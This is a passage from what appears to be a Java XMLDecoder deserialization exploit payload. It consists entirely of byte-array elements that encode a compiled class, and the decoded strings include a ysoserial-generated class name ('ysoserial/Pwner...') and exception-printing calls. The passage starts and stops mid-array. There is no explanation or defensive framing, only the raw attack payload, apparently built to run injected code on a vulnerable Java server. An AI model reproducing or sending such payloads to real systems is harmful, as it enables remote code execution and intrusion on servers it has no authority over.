index=\"3258\"><byte>0</byte></void><void index=\"3259\"><byte>-86</byte></void><void index=\"3260\"><byte>1</byte></void><void index=\"3261\"><byte>0</byte></void><void index=\"3262\"><byte>19</byte></void><void index=\"3263\"><byte>106</byte></void><void index=\"3264\"><byte>97</byte></void><void index=\"3265\"><byte>118</byte></void><void index=\"3266\"><byte>97</byte></void><void index=\"3267\"><byte>47</byte></void><void index=\"3268\"><byte>108</byte></void><void index=\"3269\"><byte>97</byte></void><void index=\"3270\"><byte>110</byte></void><void index=\"3271\"><byte>103</byte></void><void index=\"3272\"><byte>47</byte></void><void index=\"3273\"><byte>84</byte></void><void index=\"3274\"><byte>104</byte></void><void index=\"3275\"><byte>114</byte></void><void index=\"3276\"><byte>111</byte></void><void index=\"3277\"><byte>119</byte></void><void index=\"3278\"><byte>97</byte></void><void index=\"3279\"><byte>98</byte></void><void index=\"3280\"><byte>108</byte></void><void index=\"3281\"><byte>101</byte></void><void index=\"3282\"><byte>7</byte></void><void index=\"3283\"><byte>0</byte></void><void index=\"3284\"><byte>-84</byte></void><void index=\"3285\"><byte>10</byte></void><void index=\"3286\"><byte>0</byte></void><void index=\"3287\"><byte>-83</byte></void><void index=\"3288\"><byte>0</byte></void><void index=\"3289\"><byte>91</byte></void><void index=\"3290\"><byte>1</byte></void><void index=\"3291\"><byte>0</byte></void><void index=\"3292\"><byte>19</byte></void><void index=\"3293\"><byte>106</byte></void><void index=\"3294\"><byte>97</byte></void><void index=\"3295\"><byte>118</byte></void><void index=\"3296\"><byte>97</byte></void><void index=\"3297\"><byte>47</byte></void><void index=\"3298\"><byte>105</byte></void><void index=\"3299\"><byte>111</byte></void><void index=\"3300\"><byte>47</byte></void><void index=\"3301\"><byte>80</byte></void><void index=\"3302\"><byte>114</byte></void><void index=\"3303\"><byte>105</byte></void><void index=\"3304\"><byte>110</byte></void><void index=\"3305\"><byte>116</byte></void><void index=\"3306\"><byte>83</byte></void><void index=\"3307\"><byte>116</byte></void><void index=\"3308\"><byte>114</byte></void><void index=\"3309\"><byte>101</byte></void><void index=\"3310\"><byte>97</byte></void><void index=\"3311\"><byte>109</byte></void><void index=\"3312\"><byte>7</byte></void><void index=\"3313\"><byte>0</byte></void><void index=\"3314\"><byte>-81</byte></void><void index=\"3315\"><byte>1</byte></void><void index=\"3316\"><byte>0</byte></void><void index=\"3317\"><byte>7</byte></void><void index=\"3318\"><byte>112</byte></void><void index=\"3319\"><byte>114</byte></void><void index=\"3320\"><byte>105</byte></void><void index=\"3321\"><byte>110</byte></void><void index=\"3322\"><byte>116</byte></void><void index=\"3323\"><byte>108</byte></void><void index=\"3324\"><byte>110</byte></void><void index=\"3325\"><byte>12</byte></void><void index=\"3326\"><byte>0</byte></void><void index=\"3327\"><byte>-79</byte></void><void index=\"3328\"><byte>0</byte></void><void index=\"3329\"><byte>71</byte></void><void index=\"3330\"><byte>10</byte></void><void index=\"3331\"><byte>0</byte></void><void index=\"3332\"><byte>-80</byte></void><void index=\"3333\"><byte>0</byte></void><void index=\"3334\"><byte>-78</byte></void><void index=\"3335\"><byte>1</byte></void><void index=\"3336\"><byte>0</byte></void><void index=\"3337\"><byte>15</byte></void><void index=\"3338\"><byte>112</byte></void><void index=\"3339\"><byte>114</byte></void><void index=\"3340\"><byte>105</byte></void><void index=\"3341\"><byte>110</byte></void><void index=\"3342\"><byte>116</byte></void><void index=\"3343\"><byte>83</byte></void><void index=\"3344\"><byte>116</byte></void><void index=\"3345\"><byte>97</byte></void><void index=\"3346\"><byte>99</byte></void><void index=\"3347\"><byte>107</byte></void><void index=\"3348\"><byte>84</byte></void><void index=\"3349\"><byte>114</byte></void><void index=\"3350\"><byte>97</byte></void><void index=\"3351\"><byte>99</byte></void><void index=\"3352\"><byte>101</byte></void><void index=\"3353\"><byte>12</byte></void><void index=\"3354\"><byte>0</byte></void><void index=\"3355\"><byte>-76</byte></void><void index=\"3356\"><byte>0</byte></void><void index=\"3357\"><byte>11</byte></void><void index=\"3358\"><byte>10</byte></void><void index=\"3359\"><byte>0</byte></void><void index=\"3360\"><byte>-83</byte></void><void index=\"3361\"><byte>0</byte></void><void index=\"3362\"><byte>-75</byte></void><void index=\"3363\"><byte>1</byte></void><void index=\"3364\"><byte>0</byte></void><void index=\"3365\"><byte>13</byte></void><void index=\"3366\"><byte>83</byte></void><void index=\"3367\"><byte>116</byte></void><void index=\"3368\"><byte>97</byte></void><void index=\"3369\"><byte>99</byte></void><void index=\"3370\"><byte>107</byte></void><void index=\"3371\"><byte>77</byte></void><void index=\"3372\"><byte>97</byte></void><void index=\"3373\"><byte>112</byte></void><void index=\"3374\"><byte>84</byte></void><void index=\"3375\"><byte>97</byte></void><void index=\"3376\"><byte>98</byte></void><void index=\"3377\"><byte>108</byte></void><void index=\"3378\"><byte>101</byte></void><void index=\"3379\"><byte>1</byte></void><void index=\"3380\"><byte>0</byte></void><void index=\"3381\"><byte>29</byte></void><void index=\"3382\"><byte>121</byte></void><void index=\"3383\"><byte>115</byte></void><void index=\"3384\"><byte>111</byte></void><void index=\"3385\"><byte>115</byte></void><void index=\"3386\"><byte>101</byte></void><void index=\"3387\"><byte>114</byte></void><void index=\"3388\"><byte>105</byte></void><void index=\"3389\"><byte>97</byte></void><void index=\"3390\"><byte>108</byte></void><void index=\"3391\"><byte>47</byte></void><void index=\"3392\"><byte>80</byte></void><void index=\"3393\"><byte>119</byte></void><void index=\"3394\"><byte>110</byte></void><void index=\"3395\"><byte>101</byte></void><void index=\"3396\"><byte>114</byte></void><void index=\"3397\"><byte>52</byte></void><void index=\"3398\"><byte>53</byte></void><void index=\"3399\"><byte>52</byte></void><void index=\"3400\"><byte>51</byte></void><void index=\"3401\"><byte>56</byte></void><void index=\"3402\"><byte>51</byte></void><void index=\"3403\"><byte>49</byte></void><void index=\"3404\"><byte>52</byte></void><void index=\"3405\"><byte>50</byte></void><void index=\"3406\"><byte>55</byte></void><void index=\"3407\"><byte>56</byte></void><void index=\"3408\"><byte>57</byte></void><void index=\"3409\"><byte>57</byte></void><void index=\"3410\"><byte>50</byte></void><void index=\"3411\"><byte>1</byte></void><void index=\"3412\"><byte>0</byte></void><void index=\"3413\"><byte>31</byte></void><void index=\"3414\"><byte>76</byte></void><void index=\"3415\"><byte>121</byte></void><void index=\"3416\"><byte>115</byte></void><void index=\"3417\"><byte>111</byte></void><void index=\"3418\"><byte>115</byte></void><void index=\"3419\"><byte>101</byte></void><void index=\"3420\"><byte>114</byte></void><void index=\"3421\"><byte>105</byte></void><void index=\"3422\"><byte>97</byte></void><void index=\"3423\"><byte>108</byte></void><void index=\"3424\"><byte>47</byte></void><void index=\"3425\"><byte>80</byte></void><void index=\"3426\"><byte>119</byte></void><void index=\"3427\"><byte>110</byte></void><void index=\"3428\"><byte>101</byte></void><void index=\"3429\"><byte>114</byte></void><void index=\"3430\"><byte>52</byte></void><void index=\"3431\"><byte>53</byte></void><void index=\"3432\"><byte>52</byte></void><void index=\"3433\"><byte>51</byte></void><void index=\"3434\"><byte>56</byte></void><void index=\"3435\"><byte>51</byte></void><void index=\"3436\"><byte>49</byte></void><void index=\"3437\"><byte>52</byte></void><void index=\"3438\"><byte>50</byte></void><void index=\"3439\"><byte>55</byte></void><void index=\"3440\"><byte>56</byte></void><void index=\"3441\"><byte>57</byte></void><void index=\"3442\"><byte>57</byte></void><void index=\"3443\"><byte>50</byte></void><void index=\"3444\"><byte>59</byte></void><void index=\"3445\"><byte>0</byte></void><void index=\"3446\"><byte>33</byte></void><void index=\"3447\"><byte>0</byte></void><void index=\"3448\"><byte>2</byte></void><void index=\"3449\"><byte>0</byte></void><void index=\"3450\"><byte>3</byte></void><void index=\"3451\"><byte>0</byte></void><void index=\"3452\"><byte>1</byte></void><void index=\"3453\"><byte>0</byte></void><void index=\"3454\"><byte>4</byte></void><void index=\"3455\"><byte>0</byte></void><void index=\"3456\"><byte>1</byte></void><void index=\"3457\"><byte>0</byte></void><void index=\"3458\"><byte>26</byte></void><void index=\"3459\"><byte>0</byte></void><void index=\"3460\"><byte>5</byte></void><void index=\"3461\"><byte>0</byte></void><void index=\"3462\"><byte>6</byte></void><void index=\"3463\"><byte>0</byte></void><void index=\"3464\"><byte>1</byte></void><void index=\"3465\"><byte>0</byte></void><void index=\"3466\"><byte>7</byte></void><void index=\"3467\"><byte>0</byte></void><void index=\"3468\"><byte>0</byte></void><void index=\"3469\"><byte>0</byte></void><void index=\"3470\"><byte>2</byte></void><void index=\"3471\"><byte>0</byte></void><void index=\"3472\"><byte>8</byte></void><void index=\"3473\"><byte>0</byte></void><void index=\"3474\"><byte>4</byte></void><void index=\"3475\"><byte>0</byte></void><void index=\"3476\"><byte>1</byte></void><void index=\"3477\"><byte>0</byte></void><void index=\"3478\"><byte>10</byte></void><void index=\"3479\"><byte>0</byte></void><void index=\"3480\"><byte>11</byte></void><void index=\"3481\"><byte>0</byte></void><void index=\"3482\"><byte>1</byte></void><void index=\"3483\"><byte>0</byte></void><void index=\"3484\"><byte>12</byte></void><void index=\"3485\"><byte>0</byte></void><void index=\"3486\"><byte>0</byte></void><void index=\"3487\"><byte>0</byte></void><void index=\"3488\"><byte>47</byte></void><void index=\"3489\"><byte>0</byte></void><void index=\"3490\"><byte>1</byte></void><void index=\"3491\"><byte>0</byte></void><void index=\"3492\"><byte>1</byte></void><void index=\"3493\"><byte>0</byte></void><void index=\"3494\"><byte>0</byte></void><void index=\"3495\"><byte>0</byte></void><void index=\"3496\"><byte>5</byte></void><void index=\"3497\"><byte>42</byte></void><void index=\"3498\"><byte>-73</byte></void><void index=\"3499\"><byte>0</byte></void><void index=\"3500\"><byte>1</byte></void><void index=\"3501\"><byte>-79</byte></void><void index=\"3502\"><byte>0</byte></void><void index=\"3503\"><byte>0</byte></void><void index=\"3504\"><byte>0</byte></void><void index=\"3505\"><byte>2</byte></void><void index=\"3506\"><byte>0</byte></void><void index=\"3507\"><byte>13</byte></void><void index=\"3508\"><byte>0</byte></void><void index=\"3509\"><byte>0</byte></void><void index=\"3510\"><byte>0</byte></void><void index=\"3511\"><byte>6</byte></void><void index=\"3512\"><byte>0</byte></void><void index=\"3513\"><byte>1</byte></void><void index=\"3514\"><byte>0</byte></void><void index=\"3515\"><byte>0</byte></void><void index=\"3516\"><byte>0</byte></void><void index=\"3517\"><byte>47</byte></void><void index=\"3518\"><byte>0</byte></void><void index=\"3519\"><byte>14</byte></void><void index=\"3520\"><byte>0</byte></void><void index=\"3521\"><byte>0</byte></void><void index=\"3522\"><byte>0</byte></void><void index=\"3523\"><byte>12</byte></void><void index=\"3524\"><byte>0</byte></void><void index=\"3525\"><byte>1</byte></void><void index=\"3526\"><byte>0</byte></void><void index=\"3527\"><byte>0</byte></void><void index=\"3528\"><byte>0</byte></void><void index=\"3529\"><byte>5</byte></void><void index=\"3530\"><byte>0</byte></void><void index=\"3531\"><byte>15</byte></void><void index=\"3532\"><byte>0</byte></void><void index=\"3533\"><byte>-71</byte></void><void index=\"3534\"><byte>0</byte></void><void index=\"3535\"><byte>0</byte></void><void index=\"3536\"><byte>0</byte></void><void index=\"3537\"><byte>1</byte></void><void index=\"3538\"><byte>0</byte></void><void index=\"3539\"><byte>19</byte></void><void index=\"3540\"><byte>0</byte></void><void index=\"3541\"><byte>20</byte></void><void index=\"3542\"><byte>0</byte></void><void index=\"3543\"><byte>2</byte></void><void index=\"3544\"><byte>0</byte></void><void index=\"3545\"><byte>12</byte></void><void index=\"3546\"><byte>0</byte></void><void index=\"3547\"><byte>0</byte></void><void index=\"3548\"><byte>0</byte></void><void index=\"3549\"><byte>63</byte></void><void index=\"3550\"><byte>0</byte></void><void index=\"3551\"><byte>0</byte></void><void index=\"3552\"><byte>0</byte></void><void index=\"3553\"><byte>3</byte></void><void index=\"3554\"><byte>0</byte></void><void index=\"3555\"><byte>0</byte></void><void index=\"3556\"><byte>0</byte></void><void index=\"3557\"><byte>1</byte></void><void index=\"3558\"><byte>-79</byte></void><void index=\"3559\"><byte>0</byte></void><void index=\"3560\"><byte>0</byte></void><void index=\"3561\"><byte>0</byte></void><void index=\"3562\"><byte>2</byte></void><void index=\"3563\"><byte>0</byte></void><void index=\"3564\"><byte>13</byte></void><void index=\"3565\"><byte>0</byte></void><void index=\"3566\"><byte>0</byte></void><void index=\"3567\"><byte>0</byte></void><void index=\"3568\"><byte>6</byte></void><void index=\"3569\"><byte>0</byte></void><void index=\"3570\"><byte>1</byte></void><void index=\"3571\"><byte>0</byte></void><void index=\"3572\"><byte>0</byte></void><void index=\"3573\"><byte>0</byte></void><void index=\"3574\"><byte>52</byte></void><void index=\"3575\"><byte>0</byte></void><void index=\"3576\"><byte>14</byte></void><void index=\"3577\"><byte>0</byte></void><void index=\"3578\"><byte>0</byte></void><void index=\"3579\"><byte>0</byte></void><void index=\"3580\"><byte>32</byte></void><void index=\"3581\"><byte>0</byte></void><void index=\"3582\"><byte>3</byte></void><void index=\"3583\"><byte>0</byte></void><void index=\"3584\"><byte>0</byte></void><void index=\"3585\"><byte>0</byte></void><void index=\"3586\"><byte>1</byte></void><void index=\"3587\"><byte>0</byte></void><void index=\"3588\"><byte>15</byte></void><void index=\"3589\"><byte>0</byte></void><void index=\"3590\"><byte>-71</byte></void><void index=\"3591\"><byte>0</byte></void><void index=\"3592\"><byte>0</byte></void><void index=\"3593\"><byte>0</byte></void><void index=\"3594\"><byte>0</byte></void><void index=\"3595\"><byte>0</byte></void><void index=\"3596\"><byte>1</byte></void><void index=\"3597\"><byte>0</byte></void><void index=\"3598\"><byte>21</byte></void><void index=\"3599\"><byte>0</byte></void><void index=\"3600\"><byte>22</byte></void><void index=\"3601\"><byte>0</byte></void><void index=\"3602\"><byte>1</byte></void><void index=\"3603\"><byte>0</byte></void><void index=\"3604\"><byte>0</byte></void><void index=\"3605\"><byte>0</byte></void><void index=\"3606\"><byte>1</byte></void><void index=\"3607\"><byte>0</byte></void><void index=\"3608\"><byte>23</byte></void><void index=\"3609\"><byte>0</byte></void><void index=\"3610\"><byte>24</byte></void><void index=\"3611\"><byte>0</byte></void><void index=\"3612\"><byte>2</byte></void><void index=\"3613\"><byte>0</byte></void><void index=\"3614\"><byte>25</byte></void><void index=\"3615\"><byte>0</byte></void><void index=\"3616\"><byte>0</byte></void><void index=\"3617\"><byte>0</byte></void><void index=\"3618\"><byte>4</byte></void><void index=\"3619\"><byte>0</byte></void><void index=\"3620\"><byte>1</byte></void><void index=\"3621\"><byte>0</byte></void><void index=\"3622\"><byte>26</byte></void><void index=\"3623\"><byte>0</byte></void><void index=\"3624\"><byte>1</byte></void><void index=\"3625\"><byte>0</byte></void><void index=\"3626\"><byte>19</byte></void><void index=\"3627\"><byte>0</byte></void><void index=\"3628\"><byte>27</byte></void><void index=\"3629\"><byte>0</byte></void><void index=\"3630\"><byte>2</byte></void><void index=\"3631\"><byte>0</byte></void><void index=\"3632\"><byte>12</byte></void><void index=\"3633\"><byte>0</byte></void><void index=\"3634\"><byte>0</byte></void><void index=\"3635\"><byte>0</byte></void><void index=\"3636\"><byte>73</byte></void><void index=\"3637\"><byte>0</byte></void><void index=\"3638\"><byte>0</byte></void><void index=\"3639\"><byte>0</byte></void><void index=\"3640\"><byte>4</byte></void><void index=\"3641\"><byte>0</byte></void><void index=\"3642\"><byte>0</byte></void><void index=\"3643\"><byte>0</byte></void><void index=\"3644\"><byte>1</byte></void><void index=\"3645\"><byte>-79</byte></void><void index=\"3646\"><byte>0</byte></void><void index=\"3647\"><byte>0</byte></void><void index=\"3648\"><byte>0</byte></void><void index=\"3649\"><byte>2</byte></void><void index=\"3650\"><byte>0</byte></void><void index=\"3651\"><byte>13</byte></void><void index=\"3652\"><byte>0</byte></void><void index=\"3653\"><byte>0</byte></void><void index=\"3654\"><byte>0</byte></void><void index=\"3655\"><byte>6</byte></void><void index=\"3656\"><byte>0</byte></void><void index=\"3657\"><byte>1</byte></void><void index=\"3658\"><byte>0</byte></void><void index=\"3659\"><byte>0</byte></void><void index=\"3660\"><byte>0</byte></void><void index=\"3661\"><byte>56</byte></void><void index=\"3662\"><byte>0</byte></void><void index=\"3663\"><byte>14</byte></void><void index=\"3664\"><byte>0</byte></void><void index=\"3665\"><byte>0</byte></void><void index=\"3666\"><byte>0</byte></void><void index=\"3667\"><byte>42</byte></void><void index=\"3668\"><byte>0</byte></void><void index=\"3669\"><byte>4</byte></void><void index=\"3670\"><byte>0</byte></void><void index=\"3671\"><byte>0</byte></void><void index=\"3672\"><byte>0</byte></void><void index=\"3673\"><byte>1</byte></void><void index=\"3674\"><byte>0</byte></void><void index=\"3675\"><byte>15</byte></void><void index=\"3676\"><byte>0</byte></void><void index=\"3677\"><byte>-71</byte></void><void index=\"3678\"><byte>0</byte></void><void index=\"3679\"><byte>0</byte></void><void index=\"3680\"><byte>0</byte></void><void index=\"3681\"><byte>0</byte></void><void index=\"3682\"><byte>0</byte></void><void index=\"3683\"><byte>1</byte></void><void index=\"3684\"><byte>0</byte></void><void index=\"3685\"><byte>21</byte></void><void index=\"3686\"><byte>0</byte></void><void index=\"3687\"><byte>22</byte></void><void index=\"3688\"><byte>0</byte></void><void index=\"3689\"><byte>1</byte></void><void index=\"3690\"><byte>0</byte></void><void index=\"3691\"><byte>0</byte></void><void index=\"3692\"><byte>0</byte></void><void index=\"3693\"><byte>1</byte></void><void index=\"3694\"><byte>0</byte></void><void index=\"3695\"><byte>28</byte></void><void index=\"3696\"><byte>0</byte></void><void index=\"3697\"><byte>29</byte></void><void index=\"3698\"><byte>0</byte></void><void index=\"3699\"><byte>2</byte></void><void index=\"3700\"><byte>0</byte></void><void index=\"3701\"><byte>0</byte></void><void index=\"3702\"><byte>0</byte></void><void index=\"3703\"><byte>1</byte></void><void index=\"3704\"><byte>0</byte></void><void index=\"3705\"><byte>30</byte></void><void index=\"3706\"><byte>0</byte></void><void index=\"3707\"><byte>31</byte></void><void index=\"3708\"><byte>0</byte></void><void index=\"3709\"><byte>3</byte></void><void index=\"3710\"><byte>0</byte></void><void index=\"3711\"><byte>25</byte></void><void index=\"3712\"><byte>0</byte></void><void index=\"3713\"><byte>0</byte></void><void index=\"3714\"><byte>0</byte></void><void index=\"3715\"><byte>4</byte></void><void index=\"3716\"><byte>0</byte></void><void index=\"3717\"><byte>1</byte></void><void index=\"3718\"><byte>0</byte></void><void index=\"3719\"><byte>26</byte></void><void index=\"3720\"><byte>0</byte></void><void index=\"3721\"><byte>8</byte></void><void index=\"3722\"><byte>0</byte></void><void index=\"3723\"><byte>41</byte></void><void index=\"3724\"><byte>0</byte></void><void index=\"3725\"><byte>11</byte></void><void index=\"3726\"><byte>0</byte></void><void index=\"3727\"><byte>1</byte></void><void index=\"3728\"><byte>0</byte></void><void index=\"3729\"><byte>12</byte></void><void index=\"3730\"><byte>0</byte></void><void index=\"3731\"><byte>0</byte></void><void index=\"3732\"><byte>1</byte></void><void index=\"3733\"><byte>114</byte></void><void index=\"3734\"><byte>0</byte></void><void index=\"3735\"><byte>7</byte></void><void index=\"3736\"><byte>0</byte></void><void index=\"3737\"><byte>11</byte></void><void index=\"3738\"><byte>0</byte></void><void index=\"3739\"><byte>0</byte></void><void index=\"3740\"><byte>1</byte></void><void index=\"3741\"><byte>18</byte></void><void index=\"3742\"><byte>-89</byte></void><void index=\"3743\"><byte>0</byte></void><void index=\"3744\"><byte>3</byte></void><void index=\"3745\"><byte>1</byte></void><void index=\"3746\"><byte>76</byte></void><void index=\"3747\"><byte>-72</byte></void><void index=\"3748\"><byte>0</byte></void><void index=\"3749\"><byte>47</byte></void><void index=\"3750\"><byte>-64</byte></void><void index=\"3751\"><byte>0</byte></void><void index=\"3752\"><byte>49</byte></void><void index=\"3753\"><byte>-74</byte></void><void index=\"3754\"><byte>0</byte></void><void index=\"3755\"><byte>53</byte></void><void index=\"3756\"><byte>-64</byte></void><void index=\"3757\"><byte>0</byte></void><void index=\"3758\"><byte>55</byte></void><void index=\"3759\"><byte>18</byte></void><void index=\"3760\"><byte>57</byte></void><void index=\"3761\"><byte>-74</byte></void><void index=\"3762\"><byte>0</byte></void><void index=\"3763\"><byte>61</byte></void><void index=\"3764\"><byte>77</byte></void><void index=\"3765\"><byte>-72</byte></void><void index=\"3766\"><byte>0</byte></void><void index=\"3767\"><byte>47</byte></void><void index=\"3768\"><byte>-64</byte></void><void index=\"3769\"><byte>0</byte></void><void index=\"3770\"><byte>49</byte></void><void index=\"3771\"><byte>-74</byte></void><void index=\"3772\"><byte>0</byte></void><void index=\"3773\"><byte>53</byte></void><void index=\"3774\"><byte>-64</byte></void><void index=\"3775\"><byte>0</byte></void><void index=\"3776\"><byte>55</byte></void><void index=\"3777\"><byte>-74</byte></void><void index=\"3778\"><byte>0</byte></void><void index=\"3779\"><byte>65</byte></void><void index=\"3780\"><byte>78</byte></void><void index=\"3781\"><byte>45</byte></void><void index=\"3782\"><byte>18</byte></void><void index=\"3783\"><byte>67</byte></void><void index=\"3784\"><byte>-74</byte></void><void index=\"3785\"><byte>0</byte></void><void index=\"3786\"><byte>73</byte></void><void index=\"3787\"><byte>45</byte></void><void index=\"3788\"><byte>-74</byte></void><void index=\"3789\"><byte>0</byte></void><void index=\"3790\"><byte>77</byte></void><void index=\"3791\"><byte>58</byte></void><void index=\"3792\"><byte>4</byte></void><void index=\"3793\"><byte>25</byte></void><void index=\"3794\"><byte>4</byte></void><void index=\"3795\"><byte>-69</byte></void><void index=\"3796\"><byte>0</byte></void><void index=\"3797\"><byte>79</byte></void><void index=\"3798\"><byte>89</byte></void><void index=\"3799\"><byte>-69</byte></void><void index=\"3800\"><byte>0</byte></void><void index=\"3801\"><byte>81</byte></void><void index=\"3802\"><byte>89</byte></void><void index=\"3803\"><byte>-73</byte></void><void index=\"3804\"><byte>0</byte></void><void index=\"3805\"><byte>82</byte></void><void index=\"3806\"><byte>44</byte></void><void index=\"3807\"><byte>-74</byte></void><void index=\"3808\"><byte>0</byte></void><void index=\"3809\"><byte>86</byte></void><void index=\"3810\"><byte>18</byte></void><void index=\"3811\"><byte>88</byte></void><void index=\"3812\"><byte>-74</byte></void><void index=\"3813\"><byte>0</byte></void><void index=\"3814\"><byte>86</byte></void><void index=\"3815\"><byte>-74</byte></void><void index=\"3816\"><byte>0</byte></void><void index=\"3817\"><byte>92</byte></void><void index=\"3818\"><byte>-73</byte></void><void index=\"3819\"><byte>0</byte></void><void index=\"3820\"><byte>94</byte></void><void index=\"3821\"><byte>-74</byte></void><void index=\"3822\"><byte>0</byte></void><void index=\"3823\"><byte>100</byte></void><void index=\"3824\"><byte>25</byte></void><void index=\"3825\"><byte>4</byte></void><void index=\"3826\"><byte>-74</byte></void><void index=\"3827\"><byte>0</byte></void><void index=\"3828\"><byte>103</byte></void><void index=\"3829\"><byte>18</byte></void><void index=\"3830\"><byte>105</byte></void><void index=\"3831\"><byte>-72</byte></void><void index=\"3832\"><byte>0</byte></void><void index=\"3833\"><byte>110</byte></void><void index=\"3834\"><byte>58</byte></void><void index=\"3835\"><byte>5</byte></void><void index=\"3836\"><byte>25</byte></void><void index=\"3837\"><byte>5</byte></void><void index=\"3838\"><byte>1</byte></void><void index=\"3839\"><byte>-91</byte></void><void index=\"3840\"><byte>0</byte></void><void index=\"3841\"><byte>16</byte></void><void index=\"3842\"><byte>25</byte></void><void index=\"3843\"><byte>5</byte></void><void index=\"3844\"><byte>-74</byte></void><void index=\"3845\"><byte>0</byte></void><void index=\"3846\"><byte>115</byte></void><void index=\"3847\"><byte>18</byte></void><void index=\"3848\"><byte>117</byte></void><void index=\"3849\"><byte>-74</byte></void><void index=\"3850\"><byte>0</byte></void><void index=\"3851\"><byte>121</byte></void><void index=\"3852\"><byte>-102</byte></void><void index=\"3853\"><byte>0</byte></void><void index=\"3854\"><byte>6</byte></void><void index=\"3855\"><byte>-89</byte></void><void index=\"3856\"><byte>0</byte></void><void index=\"3857\"><byte>33</byte></void><void index=\"3858\"><byte>-72</byte></void><void index=\"3859\"><byte>0</byte></void><void index=\"3860\"><byte>127</byte></void><void index=\"3861\"><byte>-69</byte></void><void index=\"3862\"><byte>0</byte></void><void index=\"3863\"><byte>81</byte></void><void index=\"3864\"><byte>89</byte></void><void index=\"3865\"><byte>-73</byte></void><void index=\"3866\"><byte>0</byte></void><void index=\"3867\"><byte>82</byte></void><void index=\"3868\"><byte>18</byte></void><void index=\"3869\"><byte>-127</byte></void><void index=\"3870\"><byte>-74</byte></void><void index=\"3871\"><byte>0</byte></void><void index=\"3872\"><byte>86</byte></void><void index=\"3873\"><byte>44</byte></void><void index=\"3874\"><byte>-74</byte></void><void index=\"3875\"><byte>0</byte></void><void index=\"3876\"><byte>86</byte></void><void index=\"3877\"><byte>-74</byte></void><void index=\"3878\"><byte>0</byte></void><void index=\"3879\"><byte>92</byte></void><void index=\"3880\"><byte>-74</byte></void><void index=\"3881\"><byte>0</byte></void><void index=\"3882\"><byte>-123</byte></void><void index=\"3883\"><byte>58</byte></void><void index=\"3884\"><byte>6</byte></void><void index=\"3885\"><byte>-89</byte></void><void index=\"3886\"><byte>0</byte></void><void index=\"3887\"><byte>30</byte></void><void index=\"3888\"><byte>-72</byte></void><void index=\"3889\"><byte>0</byte></void><void index=\"3890\"><byte>127</byte></void><void index=\"3891\"><byte>-69</byte></void><void index=\"3892\"><byte>0</byte></void><void index=\"3893\"><byte>81</byte></void><void index=\"3894\"><byte>89</byte></void><void index=\"3895\"><byte>-73</byte></void><void index=\"3896\"><byte>0</byte></void><void index=\"3897\"><byte>82</byte></void><void index=\"3898\"><byte>18</byte></void><void index=\"3899\"><byte>-121</byte></void><void index=\"3900\"><byte>-74</byte></void><void index=\"3901\"><byte>0</byte></void><void index=\"3902\"><byte>86</byte></void><void index=\"3903\"><byte>44</byte></void><void index=\"3904\"><byte>-74</byte></void><void index=\"3905\"><byte>0</byte></void><void index=\"3906\"><byte>86</byte></void><void index=\"3907\"><byte>-74</byte></void><void index=\"3908\"><byte>0</byte></void><void index=\"3909\"><byte>92</byte></void><void index=\"3910\"><byte>-74</byte></void><void index=\"3911\"><byte>0</byte></void><void index=\"3912\"><byte>-123</byte></void><void index=\"3913\"><byte>58</byte></void><void index=\"3914\"><byte>6</byte></void><void index=\"3915\"><byte>-69</byte></void><void index=\"3916\"><byte>0</byte></void><void index=\"3917\"><byte>-119</byte></void><void index=\"3918\"><byte>89</byte></void><void index=\"3919\"><byte>-69</byte></void><void index=\"3920\"><byte>0</byte></void><void index=\"3921\"><byte>-117</byte></void><void index=\"3922\"><byte>89</byte></void><void index=\"3923\"><byte>25</byte></void><void index=\"3924\"><byte>6</byte></void><void index=\"3925\"><byte>-74</byte></void><void index=\"3926\"><byte>0</byte></void><void index=\"3927\"><byte>-111</byte></void><void index=\"3928\"><byte>18</byte></void><void index=\"3929\"><byte>67</byte></void><void index=\"3930\"><byte>-73</byte></void><void index=\"3931\"><byte>0</byte></void><void index=\"3932\"><byte>-108</byte></void><void index=\"3933\"><byte>-73</byte></void><void index=\"3934\"><byte>0</byte></void><void index=\"3935\"><byte>-105</byte></void><void index=\"3936\"><byte>58</byte></void><void index=\"3937\"><byte>7</byte></void><void index=\"3938\"><byte>1</byte></void><void index=\"3939\"><byte>58</byte></void><void index=\"3940\"><byte>8</byte></void><void index=\"3941\"><byte>18</byte></void><void index=\"3942\"><byte>-103</byte></void><void index=\"3943\"><byte>58</byte></void><void index=\"3944\"><byte>9</byte></void><void index=\"3945\"><byte>-89</byte></void><void index=\"3946\"><byte>0</byte></void><void index=\"3947\"><byte>25</byte></void><void index=\"3948\"><byte>-69</byte></void><void index=\"3949\"><byte>0</byte></void><void index=\"3950\"><byte>81</byte></void><void index=\"3951\"><byte>89</byte></void><void index=\"3952\"><byte>-73</byte></void><void index=\"3953\"><byte>0</byte></void><void index=\"3954\"><byte>82</byte></void><void index=\"3955\"><byte>25</byte></void><void index=\"3956\"><byte>9</byte></void><void index=\"3957\"><byte>-74</byte></void><void index=\"3958\"><byte>0</byte></void><void index=\"3959\"><byte>86</byte></void><void index=\"3960\"><byte>25</byte></void><void index=\"3961\"><byte>8</byte></void><void index=\"3962\"><byte>-74</byte></void><void index=\"3963\"><byte>0</byte></void><void index=\"3964\"><byte>86</byte></void><void index=\"3965\"><byte>-74</byte></void><void index=\"3966\"><byte>0</byte></void><void index=\"3967\"><byte>92</byte></void><void index=\"3968\"><byte>58</byte></void><void index=\"3969\"><byte>9</byte></void><void index=\"3970\"><byte>25</byte></void><void index=\"3971\"><byte>7</byte></void><void index=\"3972\"><byte>-74</byte></void><void index=\"3973\"><byte>0</byte></void><void index=\"3974\"><byte>-100</byte></void><void index=\"3975\"><byte>89</byte></void><void index=\"3976\"><byte>58</byte></void><void index=\"3977\"><byte>8</byte></void><void index=\"3978\"><byte>1</byte></void><void index=\"3979\"><byte>-90</byte></void><void index=\"3980\"><byte>-1</byte></void><void index=\"3981\"><byte>-31</byte></void><void index=\"3982\"><byte>45</byte></void><void index=\"3983\"><byte>-74</byte></void><void index=\"3984\"><byte>0</byte></void><void index=\"3985\"><byte>-96</byte></void><void index=\"3986\"><byte>25</byte></void><void index=\"3987\"><byte>9</byte></void><void index=\"3988\"><byte>-74</byte></void><void index=\"3989\"><byte>0</byte></void><void index=\"3990\"><byte>-91</byte></void><void index=\"3991\"><byte>-89</byte></void><void index=\"3992\"><byte>0</byte></void><void index=\"3993\"><byte>24</byte></void><void index=\"3994\"><byte>58</byte></void><void index=\"3995\"><byte>10</byte></void><void index=\"3996\"><byte>-78</byte></void><void index=\"3997\"><byte>0</byte></void><void index=\"3998\"><byte>-85</byte></void><void index=\"3999\"><byte>25</byte></void><void index=\"4000\"><byte>10</byte></void><void index=\"4001\"><byte>-74</byte></void><void index=\"4002\"><byte>0</byte></void><void 